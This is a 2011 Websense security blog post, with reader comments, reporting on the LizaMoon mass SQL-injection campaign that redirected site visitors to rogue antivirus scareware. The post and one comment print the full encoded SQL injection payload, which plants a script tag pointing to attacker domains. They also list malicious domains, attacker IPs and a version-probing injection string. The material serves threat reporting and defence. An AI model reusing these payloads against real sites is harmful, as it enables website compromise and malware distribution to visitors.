Websense Security Labs Blog

Websense Security Labs discovers, investigates and reports on advanced Internet threats that traditional security
research methods miss.

Update on LizaMoon mass-injection and Q&A

View all posts > 

Update on LizaMoon mass-injection and Q&A

Posted: 31 Mar 2011 01:03 PM | Patrik Runald | 50 comment(s)


The LizaMoon mass-injection campaign is still ongoing and more than 500,000 pages have a script link to lizamoon.com according to preliminary Google Search results. We have also been able to identify several other URLs that are injected in the exact same way, so the attack is even bigger than we originally thought. All in all, a search on Google returns more than 1,500,000 results that have a link with the same URL structure as the initial attack. Google Search results aren't always great indicators of how prevalent or widespread an attack is as it counts each unique URL or page, not domain or site, but it does give some indication of the scope of the problem if you look at how the numbers go up or down over time.

 

 

Additional injected URLs

Here's a list of domains that we have identified so far (with help from blog comment posters; thanks for that guys!).

 

hxxp://lizamoon.com/ur.php
hxxp://tadygus.com/ur.php
hxxp://alexblane.com/ur.php
hxxp://alisa-carter.com/ur.php
hxxp://online-stats201.info/ur.php
hxxp://stats-master111.info/ur.php
hxxp://agasi-story.info/ur.php
hxxp://general-st.info/ur.php
hxxp://extra-service.info/ur.php
hxxp://t6ryt56.info/ur.php
hxxp://sol-stats.info/ur.php
hxxp://google-stats49.info/ur.php
hxxp://google-stats45.info/ur.php
hxxp://google-stats50.info/ur.php
hxxp://stats-master88.info/ur.php
hxxp://eva-marine.info/ur.php
hxxp://stats-master99.info/ur.php
hxxp://worid-of-books.com/ur.php
hxxp://google-server43.info/ur.php
hxxp://tzv-stats.info/ur.php
hxxp://milapop.com/ur.php
hxxp://pop-stats.info/ur.php
hxxp://star-stats.info/ur.php
hxxp://multi-stats.info/ur.php
hxxp://google-stats44.info/ur.php
hxxp://books-loader.info/ur.php
hxxp://google-stats73.info/ur.php
hxxp://google-stats47.info/ur.php
hxxp://google-stats50.info/ur.php

 

List updated: 4/1/2011 12:16pm PT

 

The domain stats-master111.info was registered on October 21, 2010 which could mean the first attack happened then but we don't have any evidence of that. The first confirmed case that we know of is from December 2010, but we didn't make the connection to LizaMoon until today. The last domain, milapop.com, was registered today.

 

SQL Injection

We were able to find more information about the SQL Injection itself (thanks Peter) and the command is par for the course when it comes to SQL Injections. Here's one example:

 

+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)
%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)
%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)
%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)
%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)
%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)
%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)
%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)
%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)
+as+varchar(8)))--

 

More information is available over on Stackoverflow.com.

 

Injected code

Here is the content of an example ur.php file. The content isn't even obfuscated which is somewhat unusual. All the code does is a redirect to a rogue AV site. We've seen the scripts change over time to redirect to several different rogue AV sites:

 


What happens to the user?

We wrote in an earlier post that the payload site doesn't work properly, but further testing shows that it does and we created a video showing what happens if a user visits a website that contains the injected code. The video is available at the end of this post. The user only gets the malicious code once per IP address, so if you've already visited the site you won't get the code again. This is something we see often in attacks, especially in exploit kits.

 

The Rogue AV software that is installed is called Windows Stability Center and the file that is downloaded is currently detected by 13/43 anti-virus engines according to VirusTotal.

 

 

The software then displays a warning that there are lots of problems on your PC. To fix them you have to pay for the full version of the application. Very traditional rogue AV scam. Dancho Danchev has some more information on his blog.

 

 

Where are users coming from?

We looked at reports of traffic to lizamoon.com as indicated by data collected by the Websense Threatseeker Network and here's a graph of where those users are located.


So what about iTunes?

We received blog comments from our readers (keep them coming, we read them all!) and some were critical of our use of iTunes in the title of the previous post and how we stated that iTunes URLs had been compromised, but the script neutered by Apple. All of what we stated was technically correct, but perhaps we didn't make it clear enough.

 

Every time there's a mass-injection like this, and there really hasn't been anything this big before, we try to identify larger systems and sites that have been affected to give some indication of how wide the attack has spread. And there are few systems out there bigger than iTunes, so when we saw that content on itunes.apple.com contained the injected link we wanted to make people aware of that, even if the script didn't work. It seems that some readers weren't too happy about that and argued that we could also say that Google Search was compromised because it also shows the injected code in search results. We don't really agree with that, but perhaps we shouldn't have highlighted it the way we did.

 

Questions & Answers about the LizaMoon mass-injection

 

Q: Why is this called LizaMoon?
A: One of the first domains we saw involved in this campaign was created on March 25, 2011 was called lizamoon.com.

 

Q: How many pages have been affected by this?
A: With the complications of search algorithms and how they count results it's hard to say. Google Search returns more than 1.5 million results. A Bing Search returns about 900,000 results but the same reservation about their algorithm and how they count results applies. We believe the number of sites infected are significantly smaller.

 

Q: How does the script get added to the compromised sites?
A: We're still looking into that. We know that it uses SQL Injection to do it and not XSS as some of our blog readers have suggested.

 

Q: How do you know it's using SQL Injection?
A: We have been contacted by people who have seen the code in their Microsoft SQL databases. Initially we only received reports of users running Microsoft SQL Server 2000 and 2005 being hit but since then we have also received reports of websites using Microsoft SQL Server 2008 being injected as well.

 

Q: Could this mean that there's a vulnerability in Microsoft SQL Server 2000 and 2005?
A: No. Everything points to that this is a vulnerability in a web application. We don't know which one(s) yet but SQL Injection attacks work by issuing SQL commands in unsanitized input to the server. That doesn't mean it's a vulnerability in the SQL Server itself, it means that the web application isn't filtering input from the user correctly.

 

Q: What happens when I visit a site that contains the injected script?
A: Your PC will get redirected to a rogue AV site, displaying fake information about your PC being infected.

 

Q: Will I get redirected over and over again if I visit a compromised site?
A: No, the script only redirects you once.

 

Q: When will the LizaMoon attack be over?
A: Not anytime soon. We're still seeing references to Gumblar, which was a mass-injection attack found in 2009.

 

Video

Below is a video showing what happens when a user visits a site that has the LizaMoon script injected.

 

 



Comments

Rick Chisholm said on Thursday, March 31, 2011 5:16 PM

What would be really nice to see is the log showing the injection code at work.

Patrik Runald said on Thursday, March 31, 2011 5:21 PM

The log sample we got was incomplete and didn't show the actual injection so we're still trying to find the actual code ourselves. If any of our readers have a sample, please share it with me at prunald (a) websense.com

Thanks!

Peter Bright said on Thursday, March 31, 2011 6:06 PM

Are the injections still of the form:

GET /path/to/file?param=value'+update+tbl+set+fld=cast(fld+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(52)%2Bchar(57)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))

?

Patrik Runald said on Thursday, March 31, 2011 7:11 PM

Hi Peter,

Yes, that's it. Thanks for sending that in to us!

Bob Easton said on Friday, April 01, 2011 5:24

One article on a BBC news site said that the exploit is seen only by those using Internet Explorer? Is this really the case? Are other browsers "immune" because they fail to execute a script tag buried in a title tag buried in an anchor?

Paul said on Friday, April 01, 2011 6:01

Does this injection do anything malicious to the system or to other systems that it is sent to?

Michael Miller said on Friday, April 01, 2011 6:40

Do you have any steps/tips available for web admins to prevent the injection on their sites?

Michael Felch said on Friday, April 01, 2011 7:32

Sounds similar to the 'Swogmoh' from Blackhat Presentation in Vegas of 2006

www.blackhat.com/.../BH-Fed-06-Hoffman-up.pdf Slides 67-69

Tim Tatum said on Friday, April 01, 2011 8:18

I'm maintaining a SQL-Classic ASP web site.

We've been getting hit on SQL Server 2008

Specifically, Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (X64)

Maye said on Friday, April 01, 2011 9:59

Lizamoon first made an appearance on March 25th which is also it's domain registration date.

P. Townings said on Friday, April 01, 2011 10:08

You can add "books-loader.info" as one of the new redirects.. One infected page that was reported to have the lizamoon.info seems to have books-loader.info as the URL in the injected code.

dent said on Friday, April 01, 2011 10:27

add

google-stats73 . info

google-stats47 . info

google-stats50 . info

etc etc

Clif said on Friday, April 01, 2011 11:17

what would be nice is to have a report by ISP and Hosting company

Emp.Bob said on Friday, April 01, 2011 12:00 PM

can confirm the code,  also he/see tested a site about 6 weeks earlier with

/file.asp?param=vaule'+or+1=@@version

Shame said on Friday, April 01, 2011 12:08 PM

"SQL Server 2003". There is not such version.

B-Rad said on Friday, April 01, 2011 1:28 PM

Another thing to note about this is that it seems three days ago the TweetLister Real estate app may have had its page hacked with the LizaMoon script. I have never used TweetLister but you can see the old tweets here: search.twitter.com/search

Mad Myche said on Friday, April 01, 2011 3:20 PM

Please don't blame the DB Server for poor coding and not sanitizing the data. Slight tweaks could affect other DBs as well, be it MySql, Big Table etc.

Never heard of Sql Server 2003 though...

Donna said on Friday, April 01, 2011 3:36 PM

It drives me crazy to see how often these attacks bring down sites, and their rankings. If your site does get hit, I would contact this guy (he does more than Wordpress): smackdown.blogsblogsblogs.com/.../how-to-completely-clean-your-hacked-wordpress-installation

Joe said on Friday, April 01, 2011 3:39 PM

One of my computers is affected.. What to do help please thanks in advance!

Patrik Runald said on Friday, April 01, 2011 4:13 PM

@Bob Easton No, the attack works against other browsers as well and relies on the user to download and install the file.

@Paul It doesn't install any malicious code on the webserver but it does add the malicious script tag to the Microsoft SQL database so this has to be cleaned up.

@Michael Miller. Standard SQL injection protection techniques. There are lots of great information out there, just search for it.

@Tim Tatum Thanks for the info on SQL 2008, updated the blog post

@P.Townings, @dent Thanks, added them!

@Clif We're talking to several hosting companies but unfortunately can't share the information

@Shame You're right, updated the blog.

Darrell Crone said on Friday, April 01, 2011 5:12 PM

Ok I came to the site that was quoted in all the stories, I'm hosted on Network Solutions, and we got nailed by this. It took down our Vbulletin forums and I also had to reinstall Wordpress for our front end.

My question is this.  Me hosting a website on a virtual server, what can "I" do to stop something like this from happening again, and #2 how do I get rid of the code in the sql database.

Be kind as I am a noob in terms etc to all of this and am learning on the fly..

Thanks!

D/C

panpangoat said on Friday, April 01, 2011 7:33 PM

Could you inject the SQL injection with the Matrix?

No, seriously though, I am curious about one of the details I saw whilst reading some of the data provided. Why would you (it, one?) need a session ID, as in : software-werp[dot]co.cc/.../237 (ect, the example php)

Tony de Brum said on Friday, April 01, 2011 7:33 PM

Was advised to purchase a registry clean up program for 29.95. I did and then got notice of this .   does this attack include an offer to clean up registries which first tells you it will clean up only 100 until you buy the full program ?  It is listed as ARO 2011..www.sammsoft{dot}com/CustomerSupport.aspx and is from sammsoft.  Is this possibly another manifestation of this bug?

Mama said on Friday, April 01, 2011 9:23 PM

If you come across this re-direct hack don't do anything, leave it there and Ctrl+Alt+Del to bring up your task manager and "End Task" to shut down your browser. Just clicking the "X" may actually be an ok to load the program.

dontbecareless said on Friday, April 01, 2011 10:34 PM

This isn't a database system attack, so it matters not which system you use.  It's a bad coding practices attack, that uses the database as it's vector.

If your website, in any language, accepts form posts, querystrings, or anything else that is consumed - without any filtering done to it - directly into the database, you are at risk!

You only need to perform a few simple, routine checks on your data to weed out potential attacks, or extraneous SQL code that has been added into your queries.

Comeon people.  Are you still waiting for Obama to fix this for you?  Cause we all know that aint gonna happen!

www.google.com

Sng said on Friday, April 01, 2011 10:57 PM

I got redirected from netsol.com. I quickly tried to stop it, maybe to quickly.  Affected boot somehow.  I could not boot in any mode.  Had to end up reformatting.  Any more like this.

chardar said on Saturday, April 02, 2011 12:36

Hahahah noobs!  Security vulnerabilities are the Achilles heal of your global exploitation policies!  You don't want to pay teams of qualified software engineers to make reliable web software.  Hordes of untrained masses use hardware to sustain the Pyramid.  But when the drones get sick, the Pharaohs fail to receive their adulation!  BWAHAHAH

Francis Turner said on Saturday, April 02, 2011 2:21

This won't help the owners of the websites that have been hacked but network admins may find it useful to block the 8 relevant IP addresses in their firewalls as this will ensure that they/their users will not be infected if they visit one of the hacked sites even if the injection domain changes from one of the dozens posted here.

The IPs are 194.28.44.190, 91.220.35.151, 91.213.29.182, 95.64.9.18, 109.236.81.28 and 91.217.162.45 in the original attack plus the following two 46.252.130.200 and 84.123.115.228 that Dancho Danchev identified as what the malware redirects to.

Of course these addresses may change but it is easier to track them than the domains and, as I note in my blog post on the topic, they will probably be used for something else bad later anyway - blog.threatstop.com/.../blocking-the-lizamoon-ips

Fairportfan said on Saturday, April 02, 2011 6:49

Which (if any) anti-virus/malware programs currently detect this attack?

Jake C said on Saturday, April 02, 2011 9:33

I use Safari and found this plugin Ghostery blocks problems.

Shirley said on Saturday, April 02, 2011 12:05 PM

My first inkling that something was wrong was when I started getting mail delivery failure notices. Since I had not emailed anything out I tried to figure out what caused it.  I received an email from Amazon and it went directly to my inbox.  This is usual so I opened it and clicked through to check their daily deals. I found it added an address to my contact list at the time I received the Amazon email (9:33 am) and sent out emails to everybody in my Contact list.  I received the Amazon email at 9:33 am.  Hovering over the "from" I saw that it said "store-news.amazon.com.  Other emails from Amazon were "news-store.amazon.com". I added the first one to a blocked list and instead of it reading Store-news etc it placed the ampersand in front of the name.  I am assuming that that email was a spammer.  There were at least 3 different messages sent out to my contacts, all of which seemed benign ( I am so happy),  (I finally found it)  etc.  I sent out an apology to all my contacts.  I use a Mac with safari. I don't think it was I-tunes because I don't use I-tunes - I do use microsoft hotmail and I think it came from the amazon email.

I am not a pro at this stuff by any means so I hope this helps someone out there.

Kris said on Saturday, April 02, 2011 12:48 PM

What I would like to know is what specific framework or web application's are being targeted. It can't be just luck that the injection can guess the table structure of your application and thus inject the specific code to get it in your title tag. Brute force would take days and would be very apparent in your logs/traffic. If it is just a few then we can work on sanitizing the inputs

M. Y. said on Saturday, April 02, 2011 1:38 PM

This article omits several very important points.  Most naive users will have trouble closing the offending web page, even if they recognize it.  It's usually necessary to use Ctrl-Alt-Del to bring up Task Manager, to go to the Applications tab, and to select the browser and force it to end (close).  Unsaved web pages will be lost.

The second omission is the most important.  What if someone does give credit card information to one of these sites?  Well, it may be that the site is "phishing" and the identification and card number will be stolen.  To protect yourself, it's necessary to contact the credit card company, cancel the transaction, cancel the card, and ask for a new card.  It's probably a good idea to lock down your credit reports through the three main reporting agencies as well.  This scam is a perfect avenue for identity theft.  I wish EVERY article about it would mention that--if you are entrapped by this vile scam,  you're giving your credit info to criminals.  What should you expect would happen?

M. Y. said on Saturday, April 02, 2011 1:41 PM

Almost forgot: the best remover I've found for this malware is Malwarebytes available free from:  http://www.malwarebytes.org/  and downloadable from cnet.com.

Both of those sources are safe.  Don't get it anywhere else.  If Malwarebytes won't run or load properly, you have an additional infection.  Use another computer, presumably a clean one, to contact the malwarebytes forum and someone there will help you.  They're very patient and reliable but be prepared to be working on it for several days-- they're not very quick because they are so busy and most of them are volunteers and removing some malware is quite complex.

Charles Hayes said on Saturday, April 02, 2011 5:07 PM

I'd also suggest getting a copy of combofix from bleeping computer and running it on infected machines, as well as Malwarebytes and Hitman Pro *32 or 64 bit*.

Kate O said on Saturday, April 02, 2011 7:03 PM

I've had it happen. I did a search for "little girls, sci fi lit stats" for a kids book I've written and ended up on a porn site. I think it was tava or tavia.com or something. After ending up on the slimey porn pages and leaving, I started getting the redirect bug. So it came, I think, from there. Trend Micro doesn't even detect and annihilate it.

Patrik Runald said on Saturday, April 02, 2011 9:06 PM

We believe it's not just one web application that's vulnerable but several. We're still looking into it.

Islena said on Saturday, April 02, 2011 11:57 PM

I got hit with this, last nite.  Fake "Win 7 Anti-Virus 2011"  pop-ups and pages tried to force me into buying their fix.  I figured it was phoney.  One clue was at the top right of a screen:  option to choose "English, Deutsch, Francais, Spanish".  Hello.  A legitimate site would offer 'espanol' not spanish.  How did I pick up the virus?  I had been on Amazon.  But also am suspicious of a mexican, independant, underground, news and commentary site.  It has very interesting content but I think vulnerable to this kind of attachment.

Tony white said on Sunday, April 03, 2011 2:32

please reassure me that v6.3 customers are just as well protected as v7 clients?  We've had numerous occasions where sites have been unclassified for our product, but set as malicious site for v7 customers.

Bjarni said on Sunday, April 03, 2011 5:57

They are also using hxxp://books-loader.info/ur.php>

Damien said on Sunday, April 03, 2011 7:20

Please do NOT click on link in this post.

The sql provided by Peter is searching in one column called Fieldname, finding every  instance of </title><script src=google-stats50[dot]info/.../script> and replacing it with a single space in the entire table.

Cyberwolff said on Sunday, April 03, 2011 9:12

Seems to me that the credit card companies could bar these transactions and report where those funds would have gone.

This would end the scam and likely bring about the arrest of those involved.

Patrik Runald said on Sunday, April 03, 2011 9:46

@Tony White Yes, all the malicious URLs are categorized for all v6.x customers as well.

Lorraine said on Sunday, April 03, 2011 7:16 PM

I'm not sure if my computer has been attacked with this or not...but there's something called "Windows Repair" keeps coming up and it can't b closed. also it makes all my documents gone! can anyone help? thz!

Randy Smith said on Monday, April 04, 2011 6:32

Malware name may vary - we had to remove "Windows Expansion System" for one of our clients, which had the same graphics as the "Windows Stability Center".  So, be aware that these scareware publishers keep changing names, as has been seen historically.

Darren Stewart said on Monday, April 04, 2011 9:20

Can anyone advise (someone from Websense perhaps) if the Fake-AV infection works in cases where the user is not running as admin?

I created two videos that can assist people on XP if they wish to run as a normal user and not as an admin account (most of the time).

www.youtube.com/watch

www.youtube.com/watch

Regards

Darren

fabian llanos said on Tuesday, April 05, 2011 10:06 PM

Hi Patrik , friends

I got evidence of this malware earlier that march 26,

sites like wayn, flickeer are also infected

fabian llanos said on Tuesday, April 05, 2011 10:17 PM

I have evidence of this software earlier that mar 26, also it has some "twins" infecting other type of url

Beatrice Aragona said on Thursday, April 07, 2011 7:15

One of the computers in the office was contaminated last night, but it seems to take over everything. Cannot run any AV programs, Cannot get on internet, it won't recognize any disks, email, and the virus even popped up in the Safe mode with networking while we were trying to download a new anti virus.

deirdre said on Thursday, April 07, 2011 4:05 PM

my sons computer has been taken over by this virus- how do I get rid of it?


Leave a Comment

(required)  

Email address: (required)